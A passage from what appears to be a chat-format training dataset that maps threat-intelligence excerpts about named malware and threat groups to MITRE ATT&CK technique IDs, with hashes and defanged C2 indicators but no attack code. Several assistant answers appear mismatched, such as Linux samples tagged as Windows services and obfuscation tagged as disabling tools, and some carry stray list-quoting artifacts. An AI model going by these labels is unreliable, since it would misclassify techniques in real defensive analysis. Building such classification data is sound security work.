- "content": "A JHUHUGIT variant accesses a screenshot saved in the clipboard and converts it to a JPG image."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then reads and decrypts the content between these values to yield an IP address as shown below: ---- BEGIN SSH2 PUBLIC KEY ----Comment: \"rsa-key\"AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=---- END SSH2 PUBLIC KEY ---- A Python script to decode strings encrypted with this technique is given in Appendix B – Python Scripts"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 has created email accounts for later use in social engineering, phishing, and when registering domains."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has been known to reach a command and control server via one of nine proxy IP addresses."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During FunnyDream, the threat actors used Systeminfo to collect information on targeted hosts."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LiteDuke has the ability to decrypt and decode multiple layers of obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has cleared select event log entries."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In 2017, Sandworm Team conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport."
- },
- {
- "role": "assistant",
- "content": "T1588.006 - Vulnerabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections"
- },
- {
- "role": "assistant",
- "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "But first: How did they get the tools on the victim’s systems. The adversary copied those tools over SMB from compromised system to compromised system wherever they needed these tools"
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Summary information for the three binaries we analyzed follows: MD5 364ff454dcf00420cff13a57bcb78467 SHA-256 8bca0031f3b691421cb15f9c6e71ce19335 5d2d8cf2b190438b6962761d0c6bb ssdeep 3072:n+1R4tREtGN4qyGCXdHPYK9l0H786 O26BmMAwyWMn/qwwiHNl:n+1R43QcIL XdF0w6IBmMAwwCwwi Size 141.2 KB (144560 bytes) Type ELF 64-bit (stripped) Install as root /bin/rsyncd Root install desc synchronize and backup service Install as non-root ~/.config/dbus-notifier/dbus-inotifier Non-root install desc system service d-bus notifier C2 azureon-line[.]com (TCP/80) Usage Timeframe Late 2014 Table 1: Sample 1 – Late 2014 Sofacy 64-bit Fysbis MD5 075b6695ab63f36af65f7ffd45cccd39 SHA-256 02c7cf55fd5c5809ce2dce56085ba43795f2 480423a4256537bfdfda0df85592 ssdeep 3072:9ZAxHANuat3WWFY9nqjwbuZf454U NqRpROIDLHaSeWb3LGmPTrIW33HxIajF: 9ZAxHANJAvbuZf454UN+rv eQLZPTrV3Z Size 175.9 KB (180148 bytes) Type ELF 32-bit (stripped) Install as root /bin/ksysdefd Root install desc system kernel service defender Install as non-root ~/.config/ksysdef/ksysdefd Non-root install desc system kernel service defender C2 198.105.125[.]74 (TCP/80) Usage Timeframe Early 2015 Table 2: Sample 2 – Early 2015 Sofacy 32-bit Fysbis MD5 e107c5c84ded6cd9391aede7f04d64c8 SHA-256 fd8b2ea9a2e8a67e4cb3904b49c789d57ed 9b1ce5bebfe54fe3d98214d6a0f61 ssdeep 6144:W/D5tpLWtr91gmaVy+mdckn6BCUd c4mLc2B9:4D5Lqgkcj+ Size 314.4 KB (321902 bytes) Type ELF 64-bit (not stripped) Install as root /bin/ksysdefd Root install desc system kernel service defender Install as non-root ~/.config/ksysdef/ksysdefd Non-root install desc system kernel service defender C2 mozilla-plugins[.]com (TCP/80) Usage Timeframe Late 2015 Table 3: Sample 3 – Late 2015 Sofacy 64-bit Fysbis Overall, these binaries are assessed as low sophistication, but effective"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1543.003 - Create or Modify System Process: Windows Service', 'T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may create a temporary user on the system named “Lost_{Unique Identifier}.”"
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has stolen user's saved passwords from Chrome."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Decoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the load of a .NET assembly within memory from a paste.ee URL."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos steals and modifies data from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IronNetInjector can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AdFind can extract subnet information from Active Directory."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL has methods to check if the process the malware uses is being debugged."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpicyOmelette can identify payment systems, payment gateways, and ATM systems in compromised environments."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "lists the directories for Desktop, program files, and the user’s recently accessed files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel has decrypted the binary's configuration once the \"main\" function was launched."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A macro deletes files after it has decoded and decompressed them."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has gathered a recursive directory listing to find files and directories of interest."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel has been distributed through malicious links contained within spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie executes the \"netstat -ano\" command."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool that can run DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As mentioned previously, this backdoor also supports loading plugins. The server creates a thread that searches for files matching the following pattern lPH*.dll. If such a file exists, it is loaded and its export function ModuleStart is called. Among the various plugins we have located so far, one is able to steal recent files and files from USB thumb drives"
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Interestingly, the actors chose to leverage Cobalt Strike for lateral movement. The first of several beacon files are dropped onto the same infected endpoint running Brute Ratel C4, with the first being:"
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool', 'T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has discovered the local network configuration with ipconfig."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The cluster targeting Brazil used hacked websites and Google Ads to drive users to download the malicious installer. The campaign targeting other countries used spear-phishing as the delivery method"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT has a module that steals passwords saved in victim web browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "stages command output and collected data in files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has bypassed UAC."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As has been previously reported, there are two variants of the trojan TinkaOTP. The version that has received the most attention contains the malware payload in the application bundle’s Resources folder. The dot prefix is added in order to make it invisible in the Finder. This payload is then executed via a user LaunchAgent at ~/Library/LaunchAgents/com.aex-loop.agent.plist"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used VBSscipt macros for execution on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 Command Purpose reboot Reboot the system using shutdown command shutdown Shut down the system using shutdown command clean Wipe the Drives, C:\\, D:\\, E:\\, F:\\ screenshot Take a screenshot of the System upload Encrypt and upload the information from the system excel Leverage Excel.Application COM object for code execution outlook Leverage Outlook.Application COM object for code execution risk Leverage DCOM object for code execution Conclusion This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1082 - System Information Discovery', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1106 - Native API', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can clear all system event logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackdoorDiplomacy has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method"
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The fourth spear phishing email of the campaign was sent on January 23, 2018 to a range of targets working for Tibetan NGOs, media groups, and the CTA. The message appeared to be sent from the Director of the Tibet Museum, which is an official museum of the CTA. Attached to the email were RTF and PPSX messages that claimed to present information about the National Museum of Tibet (see Figure 5). These files contained the CVE-2017-11882 and TSSL Suite infection chain"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emissary has the capability to execute \"gpresult\"."
- },
- {
- "role": "assistant",
- "content": "T1615 - Group Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as “Tinymet“. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NavRAT is a remote access trojan (RAT) designed to upload, download and execute files. This screenshot shows the logs messages during the process injection with the API usage. NavRAT starts by copying itself (~emp.exe) to the %ProgramData%\\Ahnlab\\GoogleUpdate.exe path. NavRAT then creates a registry key in order to execute this file copy at the next reboot of the system, an initial method of persistence. The log files mentioned previously are stored in the same directory as NavRAT on the victim machine, again making it easy for us to find and analyse the additional log files. NavRAT has support for process injection. By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to extend the lifespan of the domains in case one or more are blacklisted, there are twelve different C2 domains that xparis() can be set to"
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has disabled host-based firewalls. The group has also globally opened port 3389."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a virus that propagates by infecting executables stored on shared drives."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has utilized tools to aggregate data prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CARROTBAT has the ability to execute command line arguments on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has acquired and used a variety of open source tools."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZLib communicates over HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The plugin is a Mimikatz version compiled in the Second_Release_PowerShell configuration. This version can be loaded into the address space of a PowerShell process via reflective DLL loading as implemented in the Exfiltration module of PowerSploit"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. Gamaredon Group has also used its backdoors to automatically list interesting files (such as Office documents) found on a system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During FunnyDream, the threat actors used ipconfig for discovery on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This transport library does not appear on disk in its PE format. It is maintained as encrypted resource 107 in the orchestrator module, then decrypted and loaded by the orchestrator directly into the memory of the target process. This C2 interaction module is independent, once started, it interacts with the orchestrator using its local named pipe"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used RDP for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "moved laterally via RDP."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
